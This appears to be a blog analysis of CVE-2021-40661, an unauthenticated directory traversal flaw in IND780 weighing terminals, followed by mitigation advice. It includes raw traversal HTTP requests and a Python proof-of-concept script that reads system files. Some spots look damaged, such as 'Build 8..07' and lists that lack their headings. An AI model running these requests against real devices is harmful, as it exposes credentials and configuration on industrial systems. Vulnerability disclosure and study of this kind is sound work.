CVE-2021-40661 - Remote Directory Traversal in IND780 Advanced Weighing Terminals – Analysis & Exploit

CVE-2021-40661 is a critical, remotely exploitable directory traversal vulnerability found in the IND780 Advanced Weighing Terminals—specifically in Build 8..07 (March 2018) and Version 7.2.10 (June 2012). In this long read, I’ll break down what this vulnerability means, how it can be exploited, and how it puts organizations at risk. You’ll also find real-life code snippets, example exploit requests, and links for deep-dive references.

What Is Directory Traversal?

Directory traversal, sometimes called path traversal, is a type of security vulnerability where an attacker can use specially crafted input to access files and directories outside of the intended folder. This typically happens because user input on file or path names is not properly sanitized.

When this flaw occurs in a web application (like with IND780's web interface), users may be able to access sensitive files and configurations just by tweaking the right parameters in the URL. In many cases, attackers don’t even need a valid username or password.

Where’s the Vulnerability?

In IND780 weighing terminal’s web interface, the vulnerability lies in how the webpage parameter in the AutoCE.ini file is handled. This parameter is not properly checked for directory traversal characters (../). As a result, anyone can climb out of the web root folder—possibly all the way to the system files.

How Does the Exploit Work?

There’s no authentication barrier, making this a severe risk. An attacker just needs network access to the device’s web service. They can then make requests containing directory traversal sequences in the webpage parameter.

Suppose the IND780 device is hosted at http://vulnerable-device.local/ and expects a request like

GET /AutoCE.ini?webpage=home.html HTTP/1.1
Host: vulnerable-device.local

To perform directory traversal, an attacker submits

GET /AutoCE.ini?webpage=../../../../../../windows/win.ini HTTP/1.1
Host: vulnerable-device.local

If successful, the web server will reply with the content of C:\windows\win.ini!

Sample Proof-of-Concept Script (Python)

Here’s a very basic Python script using requests that exploits this flaw and fetches the host’s boot.ini file:

import requests

target_url = "http://vulnerable-device.local/AutoCE.ini"
payload = "../../../../../../boot.ini"

params = {"webpage": payload}

resp = requests.get(target_url, params=params)
print("Status:", resp.status_code)
print("Response:\n", resp.text)

Note: Replace boot.ini with the path to any file you want to try accessing.

Configuration leaks – Dumping config files may expose admin credentials or network keys.

- Reconnaissance – By cataloging files and config, attackers can profile system versions and plan further targeted attacks, possibly leveraging known exploits for those versions.

Restrict network access to device management interfaces. Use firewalls or private VLANs.

- Monitor logs for suspicious URL access containing ../.
- Contact the vendor (Mettler Toledo) for mitigation guidance.

References & Further Reading

- NVD CVE-2021-40661 Entry
- Mettler Toledo IND780 Documentation
- Directory Traversal Attack Explanation (OWASP)

Conclusion

CVE-2021-40661 is a textbook example of why input sanitization—and limiting access to embedded web interfaces—matters. Left unpatched and exposed, a single web request can let anyone peek deep inside these critical industrial weighing systems. If you operate or service these terminals, assess your exposure and update today.

Timeline

Published on: 10/31/2022 12:15:00 UTC
Last modified on: 11/02/2022 15:50:00 UTC